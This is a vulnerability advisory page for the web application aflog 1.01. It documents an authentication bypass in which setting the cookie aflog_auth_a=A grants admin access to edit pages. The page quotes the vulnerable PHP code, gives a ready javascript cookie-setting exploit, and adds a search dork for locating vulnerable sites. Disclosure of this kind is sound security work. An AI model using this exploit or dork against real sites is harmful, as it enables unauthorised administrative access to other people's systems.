aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies

2008.10.30
Credit: JosS
Risk: High
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies # url: http://www.aflog.org/download.php # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. vuln file: /edit_delete.php vuln code: 15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){ xx: .. ---> :P 33: } 34: } else { 35: echo "<center><b><img src='img/x.png'>&nbsp;ERROR!</b><br>You do not have access to this page. You must be Signed In as 36: an Admin.</center><br>"; 37: echo "<center><a href='index.php' class='c'>Home</a> | <a href='login.php?do=form' class='c'>Sign In</a></center>": 38: } exploit: javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/"; and enters: /edit_delete.php?id=1 --> POST ID!! --- vuln files: edit_cat.php edit_lock.php edit_form.php ...more? dork: "powered by aflog" Hack0wn :D

References:

http://xforce.iss.net/xforce/xfdb/46083


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top